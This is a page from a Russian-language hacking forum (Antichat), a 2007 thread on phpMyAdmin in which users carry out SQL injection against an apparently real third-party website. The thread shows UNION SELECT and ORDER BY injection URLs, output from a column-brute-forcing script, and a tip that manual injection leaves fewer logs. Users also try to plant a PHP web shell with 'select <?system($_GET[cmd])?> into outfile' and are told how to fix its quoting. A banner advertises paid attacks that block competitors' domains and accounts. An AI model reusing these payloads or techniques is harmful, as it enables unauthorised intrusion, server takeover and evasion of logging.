УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
phpMyAdmin

Страница 2 из 3

Опции темы

Поиск в этой теме

Опции просмотра

#11

26.12.2007, 15:24

Spyder

Members of Antichat - Level 5

Регистрация: 09.10.2006

Сообщений: 1,698

Провел на форуме:
9098076

Репутация: 4303

http://www.google.ru/search?q=phpmyadmin+раскрытие+путей

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

#12

26.12.2007, 15:34

heks

Постоянный

Регистрация: 24.08.2007

Сообщений: 474

Провел на форуме:
1484154

Репутация: 126

Отправить сообщение для heks с помощью ICQ

нужен скрипт на perl'e который быстро подбирает количество столбцов при sql инекциях у кого есть пожалуйста выложите давно такой ищу

#13

26.12.2007, 15:42

Spyder

Members of Antichat - Level 5

Регистрация: 09.10.2006

Сообщений: 1,698

Провел на форуме:
9098076

Репутация: 4303

https://forum.antichat.ru/thread28461.html
https://forum.antichat.ru/threadnav24918-1-40.html

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

#14

26.12.2007, 16:01

heks

Постоянный

Регистрация: 24.08.2007

Сообщений: 474

Провел на форуме:
1484154

Репутация: 126

https://forum.antichat.ru/thread28461.html
по этой ссылке запускаю скрипт так
C:\sql\public>sql_check_111.pl -u "http://zonewm.biz/showa.php?id=129'"
мне выдает следующее

C:\sql\public>sql_check_111.pl -u "http://zonewm.biz/showa.php?id=129'"

=====_Script_Brut_Columns_=====

Wed Dec 26 16:59:16 2007

*URL:___________http://zonewm.biz/showa.php?id=129'
Evristic:______ON
Min_columns:___1
Max_columns:___50
Metod:_________UNION
SPACE:_________%20
NULL:__________1,2,3...
POST-GET:______GET
Time(sleep):___0
User-Agent:____useragent.txt
PROXY:_________proxy.txt
Log:___________log_check.txt

=====_Script_Brut_Columns_=====

GO!

Start evristic detection. Please, WAIT...

Detect MySQL

Start UNION SELECT

Please, wait...

Try 1 column...
------------------------

OK! Find 1 columns.

Right URL:
http://zonewm.biz/showa.php?id=129'%20UNION%20SELECT%201/*

что я не то делаю?

#15

26.12.2007, 16:09

AFoST

Members of Antichat - Level 5

Регистрация: 28.05.2007

Сообщений: 729

Провел на форуме:
5571194

Репутация: 1934

Отправить сообщение для AFoST с помощью ICQ

http://zonewm.biz/showa.php?id=12%20union%20select%201,2,3,4,5,6,7,8/* рукми лучше всего =)

#16

26.12.2007, 16:12

heks

Постоянный

Регистрация: 24.08.2007

Сообщений: 474

Провел на форуме:
1484154

Репутация: 126

Цитата:

Сообщение от AFoST

http://zonewm.biz/showa.php?id=12%20union%20select%201,2,3,4,5,6,7,8/* рукми лучше всего =)

дело в том что нужен скрипт ручками то я подобрал дело в том что встречаются сайты у которых по 80 строк ручками подбирать придется долго

#17

26.12.2007, 16:17

AFoST

Members of Antichat - Level 5

Регистрация: 28.05.2007

Сообщений: 729

Провел на форуме:
5571194

Репутация: 1934

алгоритм
-1+order+by+1/*
-1+order+by+100/* ошибка -> -1+order+by+50/* нет ошибки -> -1+order+by+75/* ошибка -> -1+order+by+61/*
итд...

heks, и логов меньше оставишь, и руку набьешь)))

Последний раз редактировалось AFoST; 26.12.2007 в 16:17.. Причина: Добавил

#18

26.12.2007, 16:40

heks

Постоянный

Регистрация: 24.08.2007

Сообщений: 474

Провел на форуме:
1484154

Репутация: 126

блин давно эотел найти такой запрос пасиб AFoST

#19

26.12.2007, 16:47

Ershik

Постоянный

Регистрация: 07.11.2007

Сообщений: 392

Провел на форуме:
1325167

Репутация: 100

Цитата:

Сообщение от Spyder

хм
Средствами SQL например
select <?system($_GET[cmd])?> into outfile '/путь/к/шеллу.php'

Никога так не заливал. Решил попробовать вот что выплюнул

Цитата:

Кажется возникла ошибка в Вашем SQL запросе. Описание ошибки от MySQL сервера дано ниже, возможно, оно поможет Вам разобраться ERROR: Неизвестная строка с пунктуацией @ 8 STR: <? SQL: select <?system($_GET[cmd])?> into outfile '/www/sait.ru/phpBB/index.php'

Выставил права на 777 и сделал строку типа <? SQL: select <?system($_GET[cmd])?>
Тоже самое.

#1064 - You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '<?php system($_GET[cmd])?> into outfile '/www/sait.ru/php

Последний раз редактировалось Ershik; 26.12.2007 в 17:04..

#20

26.12.2007, 16:50

AFoST

Members of Antichat - Level 5

Регистрация: 28.05.2007

Сообщений: 729

Провел на форуме:
5571194

Репутация: 1934

<?system($_GET['cmd'])?>
Обрами в "ковычки"

Страница 2 из 3

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Кодировка в PhpMyAdmin	Ershik	PHP	10	28.12.2007 10:54
Error in simple exploit phpMyAdmin	am@tory	Уязвимости	11	12.12.2007 05:05
Как залить шелл через PhpMyAdmin?	Buga	Сценарии/CMF/СMS	15	16.02.2006 22:18
Залить remview.php через phpMyAdmin	Grom	PHP	8	05.02.2006 00:19
phpmyadmin	dyx	Болталка	1	27.04.2005 17:04

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход